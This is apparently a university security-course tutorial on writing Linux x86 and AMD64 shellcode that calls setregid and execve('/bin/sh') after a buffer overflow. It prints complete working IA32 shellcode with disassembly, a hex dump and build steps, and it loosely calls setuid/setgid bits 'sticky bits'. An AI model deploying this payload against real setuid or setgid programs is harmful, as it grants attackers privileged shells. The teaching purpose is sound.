cs4459: Unit3 - Writing Shellcode Tutorial

# cs4459: Unit3 - Writing Shellcode Tutorial ## Objective Now we can change the control flow of the program by exploiting a buffer overflow vulnerability. While we could jump into execute_me() because the program contains such function, what should we do if there is no such function? The answer is, we can write the code that we want to execute, inject it to the program's address space, and then jump on to it. Then, a following question is, which code do you want to write. If you can put any code in a program's space, then you might want to run the following code: ```c= execve("/bin/sh", 0, 0); or system("/bin/sh") ``` Because, if you launch a shell ("/bin/sh", "/bin/bash", or others) from a program, this will give you the power of running any command with the inherited privilege (from the assignment binary, or the program that you want to attack.) So the code we will write and use in this week is called as `Shellcode` (because it runs a shell!). ## Requirement To run a shell, what we need to call is: `execve("/bin/sh", 0, 0)` as a system call (we can call system("/bin/sh"), but we will cover this later). However, just running the shell will not let you inherit the effective privilege set by the sticky bits; to this end, you should run the followings beforehand: ```c= setregid(getegid(), getegid()) // in case of gid, for our assignments. setreuid(geteuid(), geteuid()) // in case of uid, for the real attack cases. ``` So our job is to write a code that runs: ```c= setregid(getegid(), getegid()); execve("/bin/sh", 0, 0); ``` 3. System calls Fortunately, all such calls are not the function call. These functions are implemented in the OS kernel, and we can call the functions via system call. System call is the primary gateway to kernel open to the user's space. In the IA32 architecture of Linux, this is done by issuing *software interrupt* at `0x80`: ```asm= // IA32 int $0x80 /* In the AMD64 architecture, * this is done by issuing syscall instruction. */ // AMD64 assembly syscall ``` Then, how can we invoke system calls? ## IA32 Syscall Syscalls are defined by numbers. You can search for the system call numbers at [here][syscalls x86-32_bit]. From the table, we can see that: ``` sys_execve: 0xb sys_getegid16: 0x32 sys_setregid16: 0x47 ``` and these numbers must be set at the `%eax` register before invoking the system call. For example, running `getegid()` requires: ```asm= mov $0x32, %eax; // SYS_getegid int $0x80; ``` The return value of the system call will be stored in the EAX register. So after running `int $0x80`, the result (effective GID) will be stored in `%eax`. Next is, calling `setregid(getegid(), getegid())`. The syscall has two arguments, and in x86 architecture of Linux, arguments for the system call is passed in the following way: ``` ebx : 1st argument ecx : 2nd argument edx : 3rd argument esi : 4th argument edi : 5th argument ``` So to call `setregid(getegid(), getegid())`, ``` eax = 0x47 ebx = egid value ecx = egid value ``` and we can make this as follows: ```asm= mov %eax, %ebx // set ebx (1st arg) to the returned egid mov %eax, %ecx // set ecx (2nd arg) to the returned egid mov $0x47, %eax // set eax to $SYS_setregid int $0x80 ``` Now we move to `execve("/bin/sh", 0, 0)`. First, the syscall number is `0xb (11)`. And both 2nd and 3rd arguments are zero, so we can easily do this by making both `%ecx` and `%edx` to be zero. But, what about setting `/bin/sh` for the `%ebx` register? We should store the memory address that stores the string `/bin/sh` to `%ebx`. While different options exist, to this end, we will build a string on the stack, because stack is available memory space! One convenient way to achieve this is using push instruction to push values on the stack. We will push the following values: ```asm= push $0 // mark the end of string (NULL) push $0x68732f6e // push "n/sh" push $0x69622f2f // push "//bi" ``` Because x86 has *4-byte width* for the values, let me first adjust the string `/bin/sh` (7 bytes) to `//bin/sh` (8 bytes). First, we push zero to mark the end of the string. And then, we push `0x68732f6e`. This is the string value of `n/sh` (in little endian!). Finally, we push `0x69622f2f`, which is `//bi`. Consequently, the current stack top will store `//bi`, `n/sh`, `\0`, which will be concatenated as `//bin/sh\0`. Then how to make `%ebx` to point that address? The address of the current stack top is always stored in the `%esp` register. So, just move it. In the [shellcode-template], you can edit [shellcode.S] to write the shellcode. To build the code, you can type: ```bash= $ make 32 gcc -m32 -c -o shellcode.o shellcode.S &&\ gcc -o shellcode shellcode.o -m32 && \ objcopy -S -O binary -j .text shellcode.o shellcode.bin for 32-bit x86 shellcode. For 64bit AMD64 shellcode, you can type: $ make 64 ... ``` After building the code, I have put some convenient commands such as: ```bash= $ make objdump ``` This will show the opcode along with your assembly code: ``` shellcode.o: file format elf32-i386 ``` Disassembly of section .text: ```asm= 00000000 <main>: 0: b8 32 00 00 00 mov $0x32,%eax 5: cd 80 int $0x80 7: 89 c3 mov %eax,%ebx 9: 89 c1 mov %eax,%ecx b: b8 47 00 00 00 mov $0x47,%eax 10: cd 80 int $0x80 12: b8 0b 00 00 00 mov $0xb,%eax 17: b9 00 00 00 00 mov $0x0,%ecx 1c: ba 00 00 00 00 mov $0x0,%edx 21: 6a 00 push $0x0 23: 68 6e 2f 73 68 push $0x68732f6e 28: 68 2f 2f 62 69 push $0x69622f2f 2d: 89 e3 mov %esp,%ebx 2f: cd 80 int $0x80 ``` ```bash $ make dump ``` This will just dump the code in hexadecimal values: ``` 00000000: b832 0000 00cd 8089 c389 c1b8 4700 0000 .2..........G... 00000010: cd80 b80b 0000 00b9 0000 0000 ba00 0000 ................ 00000020: 006a 0068 6e2f 7368 682f 2f62 6989 e3cd .j.hn/shh//bi... 00000030: 80 ``` ```bash $ ./shellcode ``` And if you run this, this will actually execute your code (you should get a new shell with `$` if you coded correctly). ## AMD64 Syscall Syscalls are defined by numbers. You can search for the system call numbers at [here][syscalls x86-64_bit]. :::warning NOTE: system call numbers differs for 32-bit and 64-bit!!! Argument passing is also different! ::: Finally, run the system call with: ```asm= // not the int $0x80! syscall ``` From the table, we can see that: ``` sys_execve: 59 sys_getegid16: 108 sys_setregid16: 114 ``` and these numbers must be set at the `%rax` register before invoking the system call. For example, running `getegid()` requires: ```asm= mov $108, %rax; // SYS_getegid syscall; ``` The return value of the system call will be stored in the `%rax` register. So after running `syscall`, the result (effective GID) will be stored in `%rax`. Next is, calling `setregid(getegid(), getegid())`. The syscall has two arguments, and in the AMD64 architecture of Linux, arguments for the system call is passed in the following way: ``` rdi : 1st argument rsi : 2nd argument rdx : 3rd argument rcx : 4th argument r8 : 5th argument r9 : 6th argument ``` So to call `setregid(getegid(), getegid())`, ``` rax = 114 rdi = egid value rsi = egid value ``` and we can make this as follows: ```asm= mov %rax, %rdi // set rdi (1st arg) to the returned egid mov %rax, %rsi // set rsi (2nd arg) to the returned egid mov $114, %eax // set rax to $SYS_setregid syscall ``` Now we move to `execve("/bin/sh", 0, 0)`. First, the syscall number is `0x3b (59)`. And both 2nd and 3rd arguments are zero so we can easily do this by making both `%rsi` and `%rdx` to be zero. And we will put `//bin/sh` on the stack and make `%rdi` to point that. However, we need to do this in a different way than in x86. The reason is, there is no 8-byte value push in the AMD64 architecture. Push can only work with 1, 2, and 4 bytes for the immediate values (register pushes are 8 bytes). For instance, if you do this: ```asm= push $0 // mark the end of string (NULL) push $0x68732f6e // push "n/sh" push $0x69622f2f // push "//bi" ``` The stack will store: `0x0000000069622f2f`, `0x0000000068732f6e`, `0x0000000000000000` So the string will just be `//bi`. To push an 8 byte value, we need to move it to a register first and then push the register. Do this in the following way: ```asm= mov $0x68732f6e69622f2f, %rbx push $0 push %rbx mov %rsp, %rdi ``` In the shellcode-template (you will have this if you ran 'fetch week3'), you can edit [shellcode.S] to write the shellcode. To build the code, you can type: ```bash $ make 64 gcc -m64 -c -o shellcode.o shellcode.S gcc -o shellcode shellcode.o -m64 objcopy -S -O binary -j .text shellcode.o shellcode.bin ``` [syscalls x86-32_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit "syscalls x86-32_bit" [syscalls x86-64_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit "syscalls x86-64_bit" [shellcode-template]:https://xfersh.syssec.org/14uYkU/shellcode-template.tar.bz2 "shellcode-template" [shellcode.S]: https://codimd.syssec.org/s/KBb3so5cp "shellcode.S" --- ###### tags: `candl`,`cs4459`,`shellcode`